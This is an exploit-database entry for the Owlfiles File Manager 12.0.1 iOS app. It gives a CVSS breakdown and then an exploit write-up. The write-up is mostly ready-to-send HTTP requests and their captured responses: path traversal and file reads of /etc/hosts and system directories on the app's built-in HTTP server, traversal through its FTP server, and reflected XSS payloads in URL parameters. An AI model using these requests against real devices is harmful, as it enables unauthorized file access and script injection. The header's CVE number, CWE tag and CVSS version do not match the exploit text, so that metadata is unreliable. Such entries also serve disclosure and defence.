Exploitalert - Database of Exploits

Owlfiles File Manager 12.0.1 Multiple Vulnerabilities

CVE	Category	Price	Severity
CVE-2021-27596	CWE-79	Not specified	High

Author	Risk	Exploitation Type	Date
Tarun Gupta	High	Remote	2023-03-27

CPE
cpe:cpe:/a:owlfiles:file_manager:12.0.1

CVSS	EPSS	EPSSP
CVSS:5.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N	0.02192	0.50148

CVSS vector description

Metric	Value	Metric Description	Value Description
Attack vector	Network	AV	The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity	Low	AC	The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required	Low	PR	The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
User Interaction	None	UI	The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope	Unchanged	S	An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality	High	C	There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity	High	I	There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability	None	A	There is no impact on the availability of the system; the attacker does not have the ability to disrupt access to or use of the system.

https://cxsecurity.com/ascii/WLB-2023030059

Owlfiles File Manager 12.0.1 Multiple Vulnerabilities

# Exploit Title: Owlfiles File Manager 12.0.1 - Multiple Vulnerabilities # Date: Sep 19, 2022 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://www.skyjos.com/ # Software Link: https://apps.apple.com/us/app/owlfiles-file-manager/id510282524 # Version: 12.0.1 # Tested on: iPhone iOS 16.0 ########### path traversal on HTTP built-in server ########### GET /../../../../../../../../../../../../../../../System/ HTTP/1.1 Host: localhost:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 If-None-Match: 42638202/1663558201/177889085 If-Modified-Since: Mon, 19 Sep 2022 03:30:01 GMT Connection: close Content-Length: 0 ------- HTTP/1.1 200 OK Cache-Control: max-age=3600, public Content-Length: 317 Content-Type: text/html; charset=utf-8 Connection: Close Server: GCDWebUploader Date: Mon, 19 Sep 2022 05:01:11 GMT <!DOCTYPE html> <html><head><meta charset="utf-8"></head><body> <ul> <li><a href="Cryptexes/">Cryptexes/</a></li> <li><a href="DriverKit/">DriverKit/</a></li> <li><a href="Library/">Library/</a></li> <li><a href="Applications/">Applications/</a></li> <li><a href="Developer/">Developer/</a></li> </ul> </body></html> ############# LFI on HTTP built-in server ############# GET /../../../../../../../../../../../../../../../etc/hosts HTTP/1.1 Host: localhost:8080 Accept: application/json, text/javascript, */*; q=0.01 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25 X-Requested-With: XMLHttpRequest Referer: http://localhost:8080/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close ---- HTTP/1.1 200 OK Connection: Close Server: GCDWebUploader Content-Type: application/octet-stream Last-Modified: Sat, 03 Sep 2022 01:37:01 GMT Date: Mon, 19 Sep 2022 03:28:14 GMT Content-Length: 213 Cache-Control: max-age=3600, public Etag: 1152921500312187994/1662169021/0 ## # Host Database # # localhost is used to configure the loopback interface # when the system is booting. Do not change this entry. ## 127.0.0.1 localhost 255.255.255.255 broadcasthost ::1 localhost ############### path traversal on FTP built-in server ############### ftp> cd ../../../../../../../../../ 250 OK. Current directory is /../../../../../../../../../ ftp> ls 200 PORT command successful. 150 Accepted data connection total 10 drwxr-xr-x 0 root wheel 256 Jan 01 1970 usr drwxr-xr-x 0 root wheel 128 Jan 01 1970 bin drwxr-xr-x 0 root wheel 608 Jan 01 1970 sbin drwxr-xr-x 0 root wheel 224 Jan 01 1970 System drwxr-xr-x 0 root wheel 640 Jan 01 1970 Library drwxr-xr-x 0 root wheel 224 Jan 01 1970 private drwxr-xr-x 0 root wheel 1131 Jan 01 1970 dev drwxr-xr-x 0 root admin 4512 Jan 01 1970 Applications drwxr-xr-x 0 root admin 64 Jan 01 1970 Developer drwxr-xr-x 0 root admin 64 Jan 01 1970 cores WARNING! 10 bare linefeeds received in ASCII mode File may not have transferred correctly. 226 Transfer complete. ftp> ############# XSS on HTTP built-in server ############# poc 1: http://localhost:8080/download?path=<script>alert(1)</script> poc 2: http://localhost:8080/list?path=<script>alert(1)</script>

Impressum